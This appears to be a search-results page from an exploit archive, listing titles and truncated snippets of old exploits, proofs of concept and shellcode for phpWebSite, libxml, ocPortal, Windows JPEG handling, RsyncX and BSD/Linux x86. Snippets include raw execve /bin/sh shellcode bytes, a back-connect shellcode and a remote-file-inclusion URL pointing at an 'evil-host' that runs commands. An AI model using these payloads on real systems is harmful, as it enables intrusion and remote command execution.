1622 matches found
phpWebSite 0.7.30.8.x0.9.3 - User Module HTTP Response Splitting
phpWebSite 0.7.30.8.x0.9.3 - User Module HTTP Response Splitting source: https://www.securityfocus.com/bid/11673/info A remote HTTP response splitting vulnerability reportedly affects phpWebSite in its user module. This issue is due to a failure of the application to properly sanitize user-suppli...
libxml 2.6.12 nanoftp - Local Buffer Overflow
/ libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom n00b localho outernet gcc -Wall libsuxml.c -lxml2 n00b localho outernet ./a.out Usage: ./a.out align n00b localho outernet netstat -ant | grep 7000 n00b localho outernet ./a.out 0xbfff0360 xmlNanoFTPScanURL: Use IPv6/IPv4 format n00b...
stackShell.txt
hi, im posting here a manner for avoiding stackguard. Shellcode without zeros. // /Shellcode avoiding stack protections sample--------Vallez/29a/ // / All we have listened about stack protections. Security products are protecting stacks of code executed there. New hardware too, that will not let...
libxml 2.6.12 nanoftp - Local Buffer Overflow
libxml 2.6.12 nanoftp - Local Buffer Overflow / libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom n00b localho outernet gcc -Wall libsuxml.c -lxml2 n00b localho outernet ./a.out Usage: ./a.out align n00b localho outernet netstat -ant | grep 7000 n00b localho outernet ./a.out 0xbfff0360...
SLX Server 6.1 Arbitrary File Creation Exploit (PoC)
No description provided by source. !/usr/bin/perl Proof of concept exploit: Arbitrary file creation for SLX server 6.1 Written by Carl Livitt, Agenda Security Services, June 2004. This exploit abuses the ProcessQueueFile command on SLX 6.1 others? servers to create arbitrary files on the filesyst...
ocPortal 1.0.3 - Remote File Inclusion
http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host support php. '; ? http://localhost/ocp-103/index.php?reqpath=http://evil-host/&com=ls milw0rm.com...
ocPortal 1.0.3 - Remote File Inclusion
ocPortal 1.0.3 - Remote File Inclusion http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host support php. '; ?...
Multiple vulnerabilities in BlackBoard
Multiple vulnerabilities in BlackBoard AuThor:Cracklove emA!l:CrackloveatGmaildotCom HoMePaGe:http://ProxySky.com Info Website: http://blackboard.unclassified.de Version: 1.5.1,Maybe prior Problem: Full path disclosure,Include file Vuls 1.Full path disclosure: Let's try to request like this:...
Zinf 2.2.1 Local Buffer Overflow Exploit
No description provided by source. / -------------------------------Advisory---------------------------------- Luigi Auriemma aluigiaaaattttttautisticiD000torg I don't know why this bug has not been tracked but moreover I don't completely know why it has not been fixed yet in the Windows version ...
ROSE Attack - NewDawn3
Exploit for unknown platform in category dos / poc ====================== ROSE Attack - NewDawn3 ====================== /-------------------------------------------------------------/ / Implementation of Rose Attack described by Gandalf gandalf at digital.net Reference: Bugtraq, 30 mars 2004, "IP...
bsd/x86 connect 93 bytes
Exploit for bsd/x86 platform in category shellcode ======================== bsd/x86 connect 93 bytes ======================== / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id...
freebsd/x86 - kldload /tmp/o.o 74 bytes
freebsd/x86 kldload /tmp/o.o 74 bytes. Shellcode exploit for freebsdx86 platform / The kldload shellcode setuid0 loads /tmp/o.o kernel module Size 74 bytes OS FreeBSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor eax,eax mov al,0x17 push eax in...
Microsoft Windows - JPEG Processing Buffer Overrun (MS04-028)
Microsoft Windows - JPEG Processing Buffer Overrun MS04-028 !/bin/sh The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw The crafted JPEG header makes Windows crash a couple of different ways 1 First, it crashes when the image is opened. 2 Second, it crashes when hovering t...
Microsoft Windows - JPEG GDI+ Overflow Shellcode
// launch a local cmd.exe not bound to the net... // GDI+ buffer overrun exploit by FoToZ // NB: the headers here are only sample headers taken from a .JPG file, // with the FF FE 00 01 inserted in header1. // Sample shellcode is provided // You can put approx. 2500 bytes of shellcode...who needs...
MacOSXLabs RsyncX 2.1 - Local Privilege Escalation
source: https://www.securityfocus.com/bid/11211/info It is reported that RsyncX is prone to a local privilege escalation vulnerability. RsyncX is installed setuid root and setgid wheel. It is reported that RsyncX drops root privileges properly but fails to drop setgid wheel privileges before...
linux/x86 execve /bin/sh setreuid(12,12) 50 bytes
Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 execve /bin/sh setreuid12,12 50 bytes ================================================= / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12...
linux/x86 execve /bin/sh 30 bytes
Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 30 bytes ================================= / email protected 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" //...
linux/x86 execve /bin/sh 24 bytes
No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...
Good Patch to Multiple [XSS] Vulnerabilities in PHP-Nuke 7.4
CODEBUG Labs Patch 1 Title: Multiple XSS Bug in admin.php Author: Pierquinto 'Mantra' Manco Product: PHP-Nuke 7.4 Web: http://www.mantralab.org Register to our site and receive our newsletter! - Patch Apply this code to your admin.php file: if !empty$HTTPGETVARS'admin' die"Shit! Mantra wins ="; i...
SNMP rmon Community String (deprecated)
Binary data 1385.prm...